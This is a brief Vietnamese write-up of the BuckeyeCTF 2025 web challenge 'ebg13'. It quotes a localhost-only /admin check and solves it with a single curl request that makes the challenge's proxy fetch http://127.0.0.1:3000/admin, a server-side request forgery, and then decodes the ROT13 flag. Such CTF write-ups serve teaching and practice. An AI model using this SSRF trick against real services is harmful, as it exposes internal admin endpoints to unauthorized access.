Đề bài
Giải
Trong source code có đoạn kiểm tra sau
fastify.get('/admin', async (req, reply) => {
if (req.ip === "127.0.0.1" || req.ip === "::1" || req.ip === "::ffff:127.0.0.1") {
return reply.type('text/html').send(`Hello self! The flag is ${FLAG}.`)
}
return reply.type('text/html').send(`Hello ${req.ip}, I won't give you the flag!`)
})Nếu mở /admin thì sẽ cần IP là 127.0.0.1 hoặc ::1 và ::ffff:127.0.0.1
┌──(kali㉿kali)-[/BuckeyeCTF 2025/beginner/ebg13]
└─$ curl https://ebg13.challs.pwnoh.io/ebj13?url=http://127.0.0.1:3000/admin
<html><head></head><body>Uryyb frys! Gur synt vf opgs{jung_unccraf_vs_v_hfr_guvf_jrofvgr_ba_vgfrys}.</body></html>Flag
Flag: bctf{what_happens_if_i_use_this_website_on_itself}
'WriteUp > Web' 카테고리의 다른 글
| Web - UofTCTF 2026 (2) | 2026.01.13 |
|---|---|
| Ramesses - BuckeyeCTF 2025 (0) | 2025.11.09 |
| 5571 (0) | 2025.11.04 |
| Mark The Lyrics (0) | 2025.11.01 |
| Tiny Flag (0) | 2025.11.01 |